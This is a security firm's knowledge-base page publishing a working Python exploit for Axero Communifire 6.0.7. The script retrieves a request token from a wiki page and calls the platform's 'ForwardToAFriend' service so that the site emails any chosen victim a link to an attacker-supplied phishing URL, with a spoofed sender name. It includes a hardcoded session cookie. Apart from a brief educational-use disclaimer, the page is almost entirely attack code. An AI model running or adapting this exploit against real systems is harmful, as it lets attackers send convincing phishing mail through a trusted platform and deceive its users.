Phishing through Axero Communifire v6.0.7

Endure Secure Knowledge Base
Categories
Table of Contents
< All Topics
Print

Phishing through Axero Communifire v6.0.7

Posted
Updated
ByMatthew Brittain

Disclaimer: All exploits linked to or published on Endure Secure’s website, should never be used against an application, without the explicit, written, consent of someone who is authorised to approve security testing against that application. Exploits are published for educational purposes only.

Exploit Language

Difficulty

Easy

Category

Web Apps

CVSS

8.8

Source Code

GitHub Link

Overview

Coming Soon…

Exploit Code

#!/usr/bin/env python3
# Exploit Author: Matamorphosis
# Date: 2020-02-09
# CVSS Score: 8.8 - When publicly exposed.
# Category: Web Apps
# Version: Axero Communifire - Version 6.0.7178.7568
# Vendor Homepage: https://axerosolutions.com/
# Tested on: Windows and Ubuntu 19.10
# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

import requests, re, argparse
Parser = argparse.ArgumentParser(description="Communifire Exploit.")
Parser.add_argument('-tn', '--targetname', required=True, type=str, help='The name of your target / the victim.')
Parser.add_argument('-te', '--targetemail', required=True, type=str, help='The email address of your target / the victim.')
Parser.add_argument('-pu', '--phishingurl', required=True, type=str, help='The URL you wish the target / victim to navigate to.')
Parser.add_argument('-sn', '--sendername', required=True, type=str, help='The name you wish to specify of who the email is coming from.')
Parser.add_argument('-d', '--domain', required=True, type=str, help='The domain of the target Axero web application.')
Parser.add_argument('-wp', '--wikipage', required=True, type=str, help='The full url of any wiki page as part of the target Axero web application.')
Parser.add_argument('-cm', '--custommessage', required=False, type=str, help='Use this option to change the message sent to the victim if you choose.')
Arguments = Parser.parse_args()

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# --- Set and filter variables. ------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Domain = Arguments.domain.replace('https://', '').replace('http://', '')

if '/' in Domain:
	Domain = Domain[:Domain.find("/")]
	
Phish_URL = f'https://{Domain}/webServices/CommonWebService.asmx/ForwardToAFriend?locale=en-US'
headers = {"X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json; charset=utf-8", "RequestVerificationToken": ""}

if Arguments.custommessage:
	data = {"invitation": {"SpaceID": 2, "FriendName": Arguments.targetname, "FriendEmail": Arguments.targetemail, "EntityURL": Arguments.phishingurl, "SenderName": Arguments.sendername, "TextMessage": Arguments.custommessage, "EntityID": 521, "EntityType": 9}}

else:
	data = {"invitation": {"SpaceID": 2, "FriendName": Arguments.targetname, "FriendEmail": Arguments.targetemail, "EntityURL": Arguments.phishingurl, "SenderName": Arguments.sendername, "TextMessage": "Open this super secure link", "EntityID": 521, "EntityType": 9}}

cookies = {"cf_space_wiki_sidebar_toggle": "visible", "Communifire_UserCulture": "en-US", ".ASPXAUTH": "98D63CAB01B9E68DAADBED8CB704D439D003BD2ED802352CA4599E3B04B358966A5E1457CE0A6A7A708FC681A021D72AF2F408B4E6E12190C8B72FBCF91AB6CC0F892C9583DF4FC4823173773D6FAB8367DA0E909901E4FD50ABA8FB48EFB1B3EF98031431AF3A2743D59D28E32DC24A8E3277BFFB12BA094831E03C5DC1E43E", "CF-Guest": "dde980c9-63e1-41eb-8c80-2fabb766895d", "Communifire_ClientTimeZoneOffset": "-600"} # Manually set this if required.

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# --- The below request is made to obtain the request token needed to send the phishing email. ---------------------------------------------------------------------------------------------------------

print("[i] Attempting to obtain request token.")
Wiki_Page_Response = requests.get(Arguments.wikipage, cookies=cookies,).text
Request_Token_Regex = re.search(r'CF\_REQUEST\_TOKEN\s\=\s\'([\:\;\_\-\d\w]+)\'\,', Wiki_Page_Response)

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

# --- The below request sends the phishing email. ------------------------------------------------------------------------------------------------------------------------------------------------------

if Request_Token_Regex:
	print(f"[+] Successfully obtained a request token: {Request_Token_Regex.group(1)}.")
	headers['RequestVerificationToken'] = Request_Token_Regex.group(1)
	response = requests.post(Phish_URL, headers=headers, cookies=cookies, json=data)

	try:
		print("[+] Success." if response.json()["d"]["ResponseMessage"] == "You have successfully shared this content." else f"[-] Failed {response.text}.")

	except:
		print("[-] Failed.")

else:
	exit("[-] Failed to obtain a request token. Please ensure you provide a valid wiki page and supply cookies if authentication is required to execute the exploit.")

# ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------